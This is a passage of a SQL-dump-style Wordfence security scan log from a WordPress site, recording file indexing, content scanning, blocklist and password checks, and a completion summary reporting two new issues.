indexed'),(184547,1700155337.406794,2,'info','16500 files indexed'),(184548,1700155337.417388,2,'info','17000 files indexed'),(184549,1700155337.429022,2,'info','17500 files indexed'),(184550,1700155337.433202,2,'info','17656 files indexed'),(184551,1700155337.606147,2,'info','Analyzed 100 files containing 1.8 MB of data so far'),(184552,1700155337.927556,2,'info','Analyzed 200 files containing 3.31 MB of data so far'),(184553,1700155338.131390,2,'info','Analyzed 300 files containing 3.94 MB of data so far'),(184554,1700155338.208884,2,'info','Analyzed 400 files containing 4.44 MB of data so far'),(184555,1700155338.278448,2,'info','Analyzed 500 files containing 5.05 MB of data so far'),(184556,1700155338.351404,2,'info','Analyzed 600 files containing 5.42 MB of data so far'),(184557,1700155338.929135,2,'info','Analyzed 700 files containing 7.22 MB of data so far'),(184558,1700155338.978679,2,'info','Analyzed 800 files containing 7.59 MB of data so far'),(184559,1700155339.031275,2,'info','Analyzed 900 files containing 8.03 MB of data so far'),(184560,1700155339.176528,2,'info','Analyzed 1000 files containing 10.09 MB of data so far'),(184561,1700155339.269437,2,'info','Analyzed 1100 files containing 11.98 MB of data so far'),(184562,1700155339.380842,2,'info','Analyzed 1200 files containing 15.03 MB of data so far'),(184563,1700155339.476834,2,'info','Analyzed 1300 files containing 17.2 MB of data so far'),(184564,1700155339.587211,2,'info','Analyzed 1400 files containing 19.6 MB of data so far'),(184565,1700155339.687431,2,'info','Analyzed 1500 files containing 21.7 MB of data so far'),(184566,1700155339.789413,2,'info','Analyzed 1600 files containing 23.79 MB of data so far'),(184567,1700155339.875680,2,'info','Analyzed 1700 files containing 24.98 MB of data so far'),(184568,1700155339.941133,2,'info','Analyzed 1800 files containing 25.28 MB of data so far'),(184569,1700155339.993715,2,'info','Analyzed 1900 files containing 25.66 MB of data so far'),(184570,1700155340.037092,2,'info','Analyzed 2000 files containing 26.05 MB of data so far'),(184571,1700155340.082861,2,'info','Analyzed 2100 files containing 26.43 MB of data so far'),(184572,1700155340.131702,2,'info','Analyzed 2200 files containing 26.96 MB of data so far'),(184573,1700155340.178424,2,'info','Analyzed 2300 files containing 27.43 MB of data so far'),(184574,1700155340.221009,2,'info','Analyzed 2400 files containing 27.73 MB of data so far'),(184575,1700155340.289613,2,'info','Analyzed 2500 files containing 28.65 MB of data so far'),(184576,1700155340.337971,2,'info','Analyzed 2600 files containing 28.94 MB of data so far'),(184577,1700155340.402130,2,'info','Analyzed 2700 files containing 29.56 MB of data so far'),(184578,1700155340.456935,2,'info','Analyzed 2800 files containing 29.96 MB of data so far'),(184579,1700155340.507408,2,'info','Analyzed 2900 files containing 30.05 MB of data so far'),(184580,1700155340.570100,2,'info','Analyzed 3000 files containing 30.98 MB of data so far'),(184581,1700155340.644429,2,'info','Analyzed 3100 files containing 33.17 MB of data so far'),(184582,1700155340.729381,2,'info','Analyzed 3200 files containing 35.17 MB of data so far'),(184583,1700155340.789417,2,'info','Analyzed 3300 files containing 35.84 MB of data so far'),(184584,1700155340.843897,2,'info','Analyzed 3400 files containing 36.19 MB of data so far'),(184585,1700155340.942854,2,'info','Analyzed 3500 files containing 38.9 MB of data so far'),(184586,1700155341.003384,2,'info','Analyzed 3600 files containing 40.32 MB of data so far'),(184587,1700155341.151959,2,'info','Analyzed 3700 files containing 47.65 MB of data so far'),(184588,1700155341.281890,2,'info','Analyzed 3800 files containing 52.9 MB of data so far'),(184589,1700155341.376017,2,'info','Analyzed 3900 files containing 55.49 MB of data so far'),(184590,1700155341.482287,2,'info','Analyzed 4000 files containing 57.73 MB of data so far'),(184591,1700155341.584543,2,'info','Analyzed 4100 files containing 60.39 MB of data so far'),(184592,1700155341.659713,2,'info','Analyzed 4200 files containing 61.43 MB of data so far'),(184593,1700155341.723580,2,'info','Analyzed 4300 files containing 62.07 MB of data so far'),(184594,1700155341.803114,2,'info','Analyzed 4400 files containing 63.65 MB of data so far'),(184595,1700155341.862405,2,'info','Analyzed 4500 files containing 64.14 MB of data so far'),(184596,1700155341.938486,2,'info','Analyzed 4600 files containing 64.46 MB of data so far'),(184597,1700155341.997654,2,'info','Analyzed 4700 files containing 64.75 MB of data so far'),(184598,1700155342.061034,2,'info','Analyzed 4800 files containing 65.21 MB of data so far'),(184599,1700155342.142025,2,'info','Analyzed 4900 files containing 66.13 MB of data so far'),(184600,1700155342.209550,2,'info','Analyzed 5000 files containing 66.7 MB of data so far'),(184601,1700155342.274410,2,'info','Analyzed 5100 files containing 67.13 MB of data so far'),(184602,1700155342.333422,2,'info','Analyzed 5200 files containing 67.54 MB of data so far'),(184603,1700155342.396604,2,'info','Analyzed 5300 files containing 68.1 MB of data so far'),(184604,1700155342.457739,2,'info','Analyzed 5400 files containing 68.62 MB of data so far'),(184605,1700155342.514559,2,'info','Analyzed 5500 files containing 69.1 MB of data so far'),(184606,1700155342.571574,2,'info','Analyzed 5600 files containing 69.48 MB of data so far'),(184607,1700155342.628955,2,'info','Analyzed 5700 files containing 69.85 MB of data so far'),(184608,1700155342.691406,2,'info','Analyzed 5800 files containing 70.33 MB of data so far'),(184609,1700155342.747687,2,'info','Analyzed 5900 files containing 70.74 MB of data so far'),(184610,1700155342.805085,2,'info','Analyzed 6000 files containing 71.17 MB of data so far'),(184611,1700155342.870598,2,'info','Analyzed 6100 files containing 71.59 MB of data so far'),(184612,1700155342.930428,2,'info','Analyzed 6200 files containing 71.99 MB of data so far'),(184613,1700155342.984441,2,'info','Analyzed 6300 files containing 72.34 MB of data so far'),(184614,1700155343.042614,2,'info','Analyzed 6400 files containing 72.67 MB of data so far'),(184615,1700155343.102168,2,'info','Analyzed 6500 files containing 73.06 MB of data so far'),(184616,1700155343.165252,2,'info','Analyzed 6600 files containing 73.6 MB of data so far'),(184617,1700155343.221292,2,'info','Analyzed 6700 files containing 74.1 MB of data so far'),(184618,1700155343.274346,2,'info','Analyzed 6800 files containing 74.49 MB of data so far'),(184619,1700155343.330302,2,'info','Analyzed 6900 files containing 74.99 MB of data so far'),(184620,1700155343.389947,2,'info','Analyzed 7000 files containing 75.43 MB of data so far'),(184621,1700155343.441015,2,'info','Analyzed 7100 files containing 75.73 MB of data so far'),(184622,1700155343.500965,2,'info','Analyzed 7200 files containing 76.4 MB of data so far'),(184623,1700155343.600747,2,'info','Analyzed 7300 files containing 79.71 MB of data so far'),(184624,1700155346.644796,2,'info','Analyzed 7400 files containing 81.31 MB of data so far'),(184625,1700155346.707634,2,'info','Analyzed 7500 files containing 82.18 MB of data so far'),(184626,1700155346.782705,2,'info','Analyzed 7600 files containing 82.66 MB of data so far'),(184627,1700155346.854163,2,'info','Analyzed 7700 files containing 82.93 MB of data so far'),(184628,1700155346.935178,2,'info','Analyzed 7800 files containing 83.86 MB of data so far'),(184629,1700155347.043277,2,'info','Analyzed 7900 files containing 86.16 MB of data so far'),(184630,1700155347.149679,2,'info','Analyzed 8000 files containing 87.49 MB of data so far'),(184631,1700155347.233047,2,'info','Analyzed 8100 files containing 88.72 MB of data so far'),(184632,1700155347.327991,2,'info','Analyzed 8200 files containing 91.04 MB of data so far'),(184633,1700155347.437154,2,'info','Analyzed 8300 files containing 95.07 MB of data so far'),(184634,1700155347.484751,2,'info','Analyzed 8400 files containing 95.61 MB of data so far'),(184635,1700155347.534285,2,'info','Analyzed 8500 files containing 96.04 MB of data so far'),(184636,1700155347.584881,2,'info','Analyzed 8600 files containing 96.42 MB of data so far'),(184637,1700155347.801921,2,'info','Analyzed 8700 files containing 105.12 MB of data so far'),(184638,1700155347.914316,2,'info','Analyzed 8800 files containing 109.06 MB of data so far'),(184639,1700155347.971828,2,'info','Analyzed 8900 files containing 109.23 MB of data so far'),(184640,1700155348.053124,2,'info','Analyzed 9000 files containing 109.84 MB of data so far'),(184641,1700155348.163497,2,'info','Analyzed 9100 files containing 114.82 MB of data so far'),(184642,1700155348.222406,2,'info','Analyzed 9200 files containing 115.09 MB of data so far'),(184643,1700155348.282600,2,'info','Analyzed 9300 files containing 115.71 MB of data so far'),(184644,1700155348.373974,2,'info','Analyzed 9400 files containing 116.52 MB of data so far'),(184645,1700155348.434862,2,'info','Analyzed 9500 files containing 116.59 MB of data so far'),(184646,1700155348.493036,2,'info','Analyzed 9600 files containing 116.67 MB of data so far'),(184647,1700155348.551596,2,'info','Analyzed 9700 files containing 117.14 MB of data so far'),(184648,1700155348.664368,2,'info','Analyzed 9800 files containing 118.8 MB of data so far'),(184649,1700155348.797810,2,'info','Analyzed 9900 files containing 122.11 MB of data so far'),(184650,1700155348.849560,2,'info','Analyzed 10000 files containing 122.44 MB of data so far'),(184651,1700155348.913699,2,'info','Analyzed 10100 files containing 122.96 MB of data so far'),(184652,1700155349.022039,2,'info','Analyzed 10200 files containing 128.04 MB of data so far'),(184653,1700155349.084526,2,'info','Analyzed 10300 files containing 128.47 MB of data so far'),(184654,1700155349.201975,2,'info','Analyzed 10400 files containing 130.85 MB of data so far'),(184655,1700155349.274362,2,'info','Analyzed 10500 files containing 131.45 MB of data so far'),(184656,1700155349.384110,2,'info','Analyzed 10600 files containing 133.38 MB of data so far'),(184657,1700155349.590491,2,'info','Analyzed 10700 files containing 141.74 MB of data so far'),(184658,1700155349.760595,2,'info','Analyzed 10800 files containing 148.29 MB of data so far'),(184659,1700155349.847216,2,'info','Analyzed 10900 files containing 149.53 MB of data so far'),(184660,1700155349.906502,2,'info','Analyzed 11000 files containing 150.09 MB of data so far'),(184661,1700155349.963722,2,'info','Analyzed 11100 files containing 150.44 MB of data so far'),(184662,1700155350.028347,2,'info','Analyzed 11200 files containing 150.96 MB of data so far'),(184663,1700155350.110854,2,'info','Analyzed 11300 files containing 152.47 MB of data so far'),(184664,1700155350.149593,2,'info','Analyzed 11400 files containing 152.54 MB of data so far'),(184665,1700155350.205973,2,'info','Analyzed 11500 files containing 153.1 MB of data so far'),(184666,1700155350.274932,2,'info','Analyzed 11600 files containing 153.64 MB of data so far'),(184667,1700155350.365507,2,'info','Analyzed 11700 files containing 155.26 MB of data so far'),(184668,1700155350.460078,2,'info','Analyzed 11800 files containing 157.21 MB of data so far'),(184669,1700155350.588433,2,'info','Analyzed 11900 files containing 164.63 MB of data so far'),(184670,1700155350.673557,2,'info','Analyzed 12000 files containing 166.38 MB of data so far'),(184671,1700155350.736605,2,'info','Analyzed 12100 files containing 167.3 MB of data so far'),(184672,1700155350.826653,2,'info','Analyzed 12200 files containing 168.11 MB of data so far'),(184673,1700155350.887260,2,'info','Analyzed 12300 files containing 168.74 MB of data so far'),(184674,1700155350.960098,2,'info','Analyzed 12400 files containing 169.85 MB of data so far'),(184675,1700155351.038232,2,'info','Analyzed 12500 files containing 170.92 MB of data so far'),(184676,1700155351.122797,2,'info','Analyzed 12600 files containing 172.54 MB of data so far'),(184677,1700155351.200218,2,'info','Analyzed 12700 files containing 174.06 MB of data so far'),(184678,1700155352.524696,2,'info','Analyzed 12800 files containing 174.5 MB of data so far'),(184679,1700155352.689840,2,'info','Analyzed 12900 files containing 174.85 MB of data so far'),(184680,1700155352.783884,2,'info','Analyzed 13000 files containing 176.42 MB of data so far'),(184681,1700155353.016887,2,'info','Analyzed 13100 files containing 176.74 MB of data so far'),(184682,1700155353.071203,2,'info','Analyzed 13200 files containing 177 MB of data so far'),(184683,1700155353.146770,2,'info','Analyzed 13300 files containing 177.75 MB of data so far'),(184684,1700155353.200428,2,'info','Analyzed 13400 files containing 178.07 MB of data so far'),(184685,1700155353.248607,2,'info','Analyzed 13500 files containing 178.52 MB of data so far'),(184686,1700155353.306286,2,'info','Analyzed 13600 files containing 178.9 MB of data so far'),(184687,1700155353.366976,2,'info','Analyzed 13700 files containing 179.32 MB of data so far'),(184688,1700155353.423924,2,'info','Analyzed 13800 files containing 179.83 MB of data so far'),(184689,1700155353.531554,2,'info','Analyzed 13900 files containing 182.75 MB of data so far'),(184690,1700155353.592058,2,'info','Analyzed 14000 files containing 183.59 MB of data so far'),(184691,1700155353.656412,2,'info','Analyzed 14100 files containing 183.99 MB of data so far'),(184692,1700155353.760676,2,'info','Analyzed 14200 files containing 186.25 MB of data so far'),(184693,1700155354.044508,2,'info','Analyzed 14300 files containing 204.01 MB of data so far'),(184694,1700155354.248617,2,'info','Analyzed 14400 files containing 212.72 MB of data so far'),(184695,1700155354.350462,2,'info','Analyzed 14500 files containing 216.26 MB of data so far'),(184696,1700155354.396847,2,'info','Analyzed 14600 files containing 216.63 MB of data so far'),(184697,1700155354.461733,2,'info','Analyzed 14700 files containing 217.44 MB of data so far'),(184698,1700155354.508622,2,'info','Analyzed 14800 files containing 218.12 MB of data so far'),(184699,1700155354.604542,2,'info','Analyzed 14900 files containing 220.37 MB of data so far'),(184700,1700155354.687225,2,'info','Analyzed 15000 files containing 222.42 MB of data so far'),(184701,1700155354.817538,2,'info','Analyzed 15100 files containing 225.57 MB of data so far'),(184702,1700155354.934680,2,'info','Analyzed 15200 files containing 227.35 MB of data so far'),(184703,1700155355.002484,2,'info','Analyzed 15300 files containing 228.05 MB of data so far'),(184704,1700155355.107808,2,'info','Analyzed 15400 files containing 230.69 MB of data so far'),(184705,1700155355.208577,2,'info','Analyzed 15500 files containing 232.51 MB of data so far'),(184706,1700155355.289781,2,'info','Analyzed 15600 files containing 233.16 MB of data so far'),(184707,1700155355.386837,2,'info','Analyzed 15700 files containing 234.76 MB of data so far'),(184708,1700155355.450498,2,'info','Analyzed 15800 files containing 235.6 MB of data so far'),(184709,1700155355.505418,2,'info','Analyzed 15900 files containing 235.85 MB of data so far'),(184710,1700155355.549856,2,'info','Analyzed 16000 files containing 236.08 MB of data so far'),(184711,1700155355.602525,2,'info','Analyzed 16100 files containing 236.36 MB of data so far'),(184712,1700155355.656423,2,'info','Analyzed 16200 files containing 236.6 MB of data so far'),(184713,1700155355.707629,2,'info','Analyzed 16300 files containing 236.71 MB of data so far'),(184714,1700155355.753635,2,'info','Analyzed 16400 files containing 236.92 MB of data so far'),(184715,1700155355.817173,2,'info','Analyzed 16500 files containing 237.74 MB of data so far'),(184716,1700155355.892595,2,'info','Analyzed 16600 files containing 239.93 MB of data so far'),(184717,1700155356.004183,2,'info','Analyzed 16700 files containing 242.92 MB of data so far'),(184718,1700155356.074567,2,'info','Analyzed 16800 files containing 243.85 MB of data so far'),(184719,1700155356.136102,2,'info','Analyzed 16900 files containing 245.24 MB of data so far'),(184720,1700155356.465101,2,'info','Analyzed 17000 files containing 262.63 MB of data so far'),(184721,1700155356.605661,2,'info','Analyzed 17100 files containing 266.59 MB of data so far'),(184722,1700155356.698250,2,'info','Analyzed 17200 files containing 267.92 MB of data so far'),(184723,1700155356.900588,2,'info','Analyzed 17300 files containing 270.38 MB of data so far'),(184724,1700155357.072284,2,'info','Analyzed 17400 files containing 274.36 MB of data so far'),(184725,1700155357.137949,2,'info','Analyzed 17500 files containing 276.51 MB of data so far'),(184726,1700155357.274838,2,'info','Analyzed 17600 files containing 277.76 MB of data so far'),(184727,1700155357.311032,2,'info','Analyzed 17656 files containing 278.69 MB of data.'),(184728,1700155357.311177,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(184729,1700155357.313326,10,'info','SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),(184730,1700155357.315235,10,'info','SUM_ENDOK:Scanning for known malware files'),(184731,1700155357.319141,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(184732,1700155357.741928,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(184733,1700155357.745476,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(184734,1700155357.746666,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(184735,1700155358.261709,2,'info','Starting scan of file contents'),(184736,1700155359.272154,2,'info','Scanned contents of 24 additional files at 23.77 per second'),(184737,1700155360.302909,2,'info','Scanned contents of 57 additional files at 27.94 per second'),(184738,1700155361.307582,2,'info','Scanned contents of 149 additional files at 48.93 per second'),(184739,1700155362.316688,2,'info','Scanned contents of 249 additional files at 61.42 per second'),(184740,1700155363.320136,2,'info','Scanned contents of 302 additional files at 59.71 per second'),(184741,1700155364.321571,2,'info','Scanned contents of 361 additional files at 59.58 per second'),(184742,1700155365.337894,2,'info','Scanned contents of 428 additional files at 60.49 per second'),(184743,1700155366.352399,2,'info','Scanned contents of 497 additional files at 61.44 per second'),(184744,1700155367.374271,2,'info','Scanned contents of 540 additional files at 59.26 per second'),(184745,1700155368.379934,2,'info','Scanned contents of 618 additional files at 61.08 per second'),(184746,1700155369.383879,2,'info','Scanned contents of 665 additional files at 59.80 per second'),(184747,1700155370.394624,2,'info','Scanned contents of 736 additional files at 60.67 per second'),(184748,1700155371.414037,2,'info','Scanned contents of 805 additional files at 61.21 per second'),(184749,1700155372.433532,2,'info','Scanned contents of 862 additional files at 60.83 per second'),(184750,1700155373.526968,2,'info','Scanned contents of 921 additional files at 60.34 per second'),(184751,1700155374.665118,2,'info','Scanned contents of 986 additional files at 60.11 per second'),(184752,1700155375.667972,2,'info','Scanned contents of 1001 additional files at 57.51 per second'),(184753,1700155376.672112,2,'info','Scanned contents of 1085 additional files at 58.94 per second'),(184754,1700155377.684235,2,'info','Scanned contents of 1165 additional files at 59.98 per second'),(184755,1700155378.685470,2,'info','Scanned contents of 1239 additional files at 60.67 per second'),(184756,1700155379.713548,2,'info','Scanned contents of 1286 additional files at 59.95 per second'),(184757,1700155380.732300,2,'info','Scanned contents of 1346 additional files at 59.90 per second'),(184758,1700155381.736638,2,'info','Scanned contents of 1403 additional files at 59.77 per second'),(184759,1700155382.742638,2,'info','Scanned contents of 1455 additional files at 59.44 per second'),(184760,1700155383.761140,2,'info','Scanned contents of 1484 additional files at 58.20 per second'),(184761,1700155384.816082,2,'info','Scanned contents of 1568 additional files at 59.05 per second'),(184762,1700155385.911846,2,'info','Scanned contents of 1595 additional files at 57.69 per second'),(184763,1700155386.917155,2,'info','Scanned contents of 1714 additional files at 59.82 per second'),(184764,1700155387.940773,2,'info','Scanned contents of 1757 additional files at 59.20 per second'),(184765,1700155388.944085,2,'info','Scanned contents of 1781 additional files at 58.05 per second'),(184766,1700155389.947190,2,'info','Scanned contents of 1835 additional files at 57.91 per second'),(184767,1700155391.036600,2,'info','Scanned contents of 1855 additional files at 56.60 per second'),(184768,1700155392.128399,2,'info','Scanned contents of 1870 additional files at 55.22 per second'),(184769,1700155393.145113,2,'info','Scanned contents of 1903 additional files at 54.55 per second'),(184770,1700155394.184276,2,'info','Scanned contents of 1934 additional files at 53.84 per second'),(184771,1700155395.217803,2,'info','Scanned contents of 1956 additional files at 52.93 per second'),(184772,1700155396.269955,2,'info','Scanned contents of 1977 additional files at 52.02 per second'),(184773,1700155397.295861,2,'info','Scanned contents of 2021 additional files at 51.78 per second'),(184774,1700155398.358456,2,'info','Scanned contents of 2054 additional files at 51.23 per second'),(184775,1700155399.393412,2,'info','Scanned contents of 2077 additional files at 50.50 per second'),(184776,1700155400.396501,2,'info','Scanned contents of 2108 additional files at 50.03 per second'),(184777,1700155401.406390,2,'info','Scanned contents of 2140 additional files at 49.60 per second'),(184778,1700155402.410601,2,'info','Scanned contents of 2168 additional files at 49.11 per second'),(184779,1700155403.415683,2,'info','Scanned contents of 2247 additional files at 49.76 per second'),(184780,1700155404.418508,2,'info','Scanned contents of 2326 additional files at 50.39 per second'),(184781,1700155405.470786,2,'info','Scanned contents of 2409 additional files at 51.03 per second'),(184782,1700155406.496292,2,'info','Scanned contents of 2482 additional files at 51.46 per second'),(184783,1700155407.499104,2,'info','Scanned contents of 2562 additional files at 52.03 per second'),(184784,1700155408.500208,2,'info','Scanned contents of 2643 additional files at 52.61 per second'),(184785,1700155409.502725,2,'info','Scanned contents of 2741 additional files at 53.49 per second'),(184786,1700155410.504824,2,'info','Scanned contents of 2834 additional files at 54.25 per second'),(184787,1700155411.508949,2,'info','Scanned contents of 2932 additional files at 55.06 per second'),(184788,1700155412.536443,2,'info','Scanned contents of 3022 additional files at 55.68 per second'),(184789,1700155413.538242,2,'info','Scanned contents of 3109 additional files at 56.25 per second'),(184790,1700155414.544164,2,'info','Scanned contents of 3203 additional files at 56.91 per second'),(184791,1700155415.551252,2,'info','Scanned contents of 3307 additional files at 57.73 per second'),(184792,1700155416.558402,2,'info','Scanned contents of 3410 additional files at 58.49 per second'),(184793,1700155417.560594,2,'info','Scanned contents of 3501 additional files at 59.04 per second'),(184794,1700155418.565904,2,'info','Scanned contents of 3580 additional files at 59.37 per second'),(184795,1700155419.567901,2,'info','Scanned contents of 3658 additional files at 59.67 per second'),(184796,1700155420.571084,2,'info','Scanned contents of 3758 additional files at 60.31 per second'),(184797,1700155421.584010,2,'info','Scanned contents of 3801 additional files at 60.03 per second'),(184798,1700155422.590578,2,'info','Scanned contents of 3908 additional files at 60.75 per second'),(184799,1700155423.594559,2,'info','Scanned contents of 4026 additional files at 61.62 per second'),(184800,1700155424.598596,2,'info','Scanned contents of 4128 additional files at 62.23 per second'),(184801,1700155425.601328,2,'info','Scanned contents of 4237 additional files at 62.92 per second'),(184802,1700155426.605121,2,'info','Scanned contents of 4342 additional files at 63.53 per second'),(184803,1700155427.606058,2,'info','Scanned contents of 4435 additional files at 63.96 per second'),(184804,1700155428.618411,2,'info','Scanned contents of 4543 additional files at 64.57 per second'),(184805,1700155429.621071,2,'info','Scanned contents of 4645 additional files at 65.09 per second'),(184806,1700155430.621619,2,'info','Scanned contents of 4752 additional files at 65.67 per second'),(184807,1700155431.645461,2,'info','Scanned contents of 4799 additional files at 65.40 per second'),(184808,1700155432.788118,2,'info','Scanned contents of 4834 additional files at 64.86 per second'),(184809,1700155433.796218,2,'info','Scanned contents of 4874 additional files at 64.53 per second'),(184810,1700155434.821044,2,'info','Scanned contents of 4908 additional files at 64.11 per second'),(184811,1700155435.886600,2,'info','Scanned contents of 4927 additional files at 63.47 per second'),(184812,1700155436.911371,2,'info','Scanned contents of 4942 additional files at 62.84 per second'),(184813,1700155437.961890,2,'info','Scanned contents of 4957 additional files at 62.20 per second'),(184814,1700155439.000328,2,'info','Scanned contents of 4973 additional files at 61.59 per second'),(184815,1700155440.078830,2,'info','Scanned contents of 4985 additional files at 60.93 per second'),(184816,1700155441.150761,2,'info','Scanned contents of 4996 additional files at 60.27 per second'),(184817,1700155442.184209,2,'info','Scanned contents of 5017 additional files at 59.78 per second'),(184818,1700155443.287419,2,'info','Scanned contents of 5041 additional files at 59.29 per second'),(184819,1700155444.331849,2,'info','Scanned contents of 5062 additional files at 58.81 per second'),(184820,1700155445.359800,2,'info','Scanned contents of 5109 additional files at 58.66 per second'),(184821,1700155446.425626,2,'info','Scanned contents of 5141 additional files at 58.31 per second'),(184822,1700155447.509387,2,'info','Scanned contents of 5167 additional files at 57.90 per second'),(184823,1700155448.513702,2,'info','Scanned contents of 5195 additional files at 57.56 per second'),(184824,1700155449.520671,2,'info','Scanned contents of 5283 additional files at 57.89 per second'),(184825,1700155450.547879,2,'info','Scanned contents of 5351 additional files at 57.98 per second'),(184826,1700155451.550939,2,'info','Scanned contents of 5417 additional files at 58.07 per second'),(184827,1700155452.571975,2,'info','Scanned contents of 5538 additional files at 58.72 per second'),(184828,1700155453.746068,2,'info','Scanned contents of 5545 additional files at 58.07 per second'),(184829,1700155454.748695,2,'info','Scanned contents of 5697 additional files at 59.04 per second'),(184830,1700155456.069353,2,'info','Scanned contents of 5778 additional files at 59.08 per second'),(184831,1700155457.092850,2,'info','Scanned contents of 5816 additional files at 58.85 per second'),(184832,1700155458.139176,2,'info','Scanned contents of 5840 additional files at 58.47 per second'),(184833,1700155459.182743,2,'info','Scanned contents of 5905 additional files at 58.51 per second'),(184834,1700155460.206322,2,'info','Scanned contents of 5946 additional files at 58.33 per second'),(184835,1700155461.216060,2,'info','Scanned contents of 6000 additional files at 58.28 per second'),(184836,1700155462.222542,2,'info','Scanned contents of 6045 additional files at 58.15 per second'),(184837,1700155463.250505,2,'info','Scanned contents of 6065 additional files at 57.77 per second'),(184838,1700155464.256759,2,'info','Scanned contents of 6077 additional files at 57.33 per second'),(184839,1700155465.264849,2,'info','Scanned contents of 6088 additional files at 56.90 per second'),(184840,1700155466.307483,2,'info','Scanned contents of 6100 additional files at 56.46 per second'),(184841,1700155467.551574,2,'info','Scanned contents of 6108 additional files at 55.89 per second'),(184842,1700155468.559610,2,'info','Scanned contents of 6116 additional files at 55.45 per second'),(184843,1700155469.659344,2,'info','Scanned contents of 6123 additional files at 54.97 per second'),(184844,1700155470.874942,2,'info','Scanned contents of 6130 additional files at 54.43 per second'),(184845,1700155472.159670,2,'info','Scanned contents of 6134 additional files at 53.86 per second'),(184846,1700155473.390293,2,'info','Scanned contents of 6138 additional files at 53.31 per second'),(184847,1700155474.409761,2,'info','Scanned contents of 6194 additional files at 53.33 per second'),(184848,1700155475.642994,2,'info','Scanned contents of 6201 additional files at 52.83 per second'),(184849,1700155476.654926,2,'info','Scanned contents of 6228 additional files at 52.60 per second'),(184850,1700155477.665058,2,'info','Scanned contents of 6284 additional files at 52.63 per second'),(184851,1700155478.787248,2,'info','Scanned contents of 6326 additional files at 52.49 per second'),(184852,1700155479.797236,2,'info','Scanned contents of 6372 additional files at 52.43 per second'),(184853,1700155480.797626,2,'info','Scanned contents of 6396 additional files at 52.20 per second'),(184854,1700155481.800613,2,'info','Scanned contents of 6464 additional files at 52.32 per second'),(184855,1700155482.803957,2,'info','Scanned contents of 6547 additional files at 52.57 per second'),(184856,1700155483.811678,2,'info','Scanned contents of 6611 additional files at 52.66 per second'),(184857,1700155484.815984,2,'info','Scanned contents of 6663 additional files at 52.65 per second'),(184858,1700155485.837025,2,'info','Scanned contents of 6679 additional files at 52.35 per second'),(184859,1700155486.839782,2,'info','Scanned contents of 6719 additional files at 52.26 per second'),(184860,1700155487.847259,2,'info','Scanned contents of 6759 additional files at 52.16 per second'),(184861,1700155488.913445,2,'info','Scanned contents of 6788 additional files at 51.96 per second'),(184862,1700155489.426469,2,'info','Scanned contents of 6799 additional files at 51.84 per second'),(184863,1700155489.426657,2,'info','Asking Wordfence to check URLs against malware list.'),(184864,1700155489.485066,2,'info','Checking 15693 host keys against Wordfence scanning servers.'),(184865,1700155489.691096,2,'info','Done host key check.'),(184866,1700155489.695323,2,'info','Done file contents scan'),(184867,1700155489.696172,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(184868,1700155489.698417,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(184869,1700155489.701588,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(184870,1700155489.702792,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(184871,1700155489.706002,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(184872,1700155489.735423,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(184873,1700155489.735855,2,'info','Checking 68 host keys against Wordfence scanning servers.'),(184874,1700155489.848297,2,'info','Done host key check.'),(184875,1700155489.848607,2,'info','Done examining URLs'),(184876,1700155489.849177,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(184877,1700155489.852696,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(184878,1700155489.855972,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(184879,1700155489.859377,10,'info','SUM_START:Scanning for weak passwords'),(184880,1700155489.861182,2,'info','Starting password strength check on 3 users.'),(184881,1700155489.877326,10,'info','SUM_ENDOK:Scanning for weak passwords'),(184882,1700155489.880796,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(184883,1700155503.796019,3,'error','Unable to determine version for plugin folders'),(184884,1700155503.797315,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(184885,1700155503.800820,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(184886,1700155503.918126,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(184887,1700155503.921596,10,'info','SUM_START:Scanning for suspicious site options'),(184888,1700155503.937744,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(184889,1700155503.938172,2,'info','Done examining URLs'),(184890,1700155503.938750,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(184891,1700155503.941383,1,'info','-------------------'),(184892,1700155503.941638,2,'info','Wordfence used 30.21 MB of memory for scan. Server peak memory usage was: 62.21 MB'),(184893,1700155503.946568,1,'info','Scan Complete. Scanned 17656 files, 40 plugins, 2 themes, 58 posts, 0 comments and 20442 URLs in 2 minutes 54 seconds.'),(184894,1700155503.946791,10,'info','SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),(185264,1700415188.585421,2,'info','Scanned contents of 5047 additional files at 57.05 per second'),(185265,1700415189.644918,2,'info','Scanned contents of 5069 additional files at 56.62 per second'),(185266,1700415190.648124,2,'info','Scanned contents of 5115 additional files at 56.51 per second'),(185267,1700415191.712377,2,'info','Scanned contents of 5141 additional files at 56.13 per second'),(185268,1700415192.821374,2,'info','Scanned contents of 5167 additional files at 55.74 per second'),(185269,1700415193.827341,2,'info','Scanned contents of 5190 additional files at 55.39 per second'),(185270,1700415194.827418,2,'info','Scanned contents of 5266 additional files at 55.61 per second'),(185271,1700415195.840164,2,'info','Scanned contents of 5339 additional files at 55.78 per second'),(185272,1700415196.857832,2,'info','Scanned contents of 5402 additional files at 55.84 per second'),(185273,1700415197.859889,2,'info','Scanned contents of 5515 additional files at 56.43 per second'),(185274,1700415199.305627,2,'info','Scanned contents of 5545 additional files at 55.91 per second'),(185275,1700415200.306764,2,'info','Scanned contents of 5703 additional files at 56.93 per second'),(185276,1700415201.664537,2,'info','Scanned contents of 5778 additional files at 56.90 per second'),(185277,1700415202.676867,2,'info','Scanned contents of 5814 additional files at 56.69 per second'),(185278,1700415203.679173,2,'info','Scanned contents of 5834 additional files at 56.34 per second'),(185279,1700415204.686499,2,'info','Scanned contents of 5881 additional files at 56.24 per 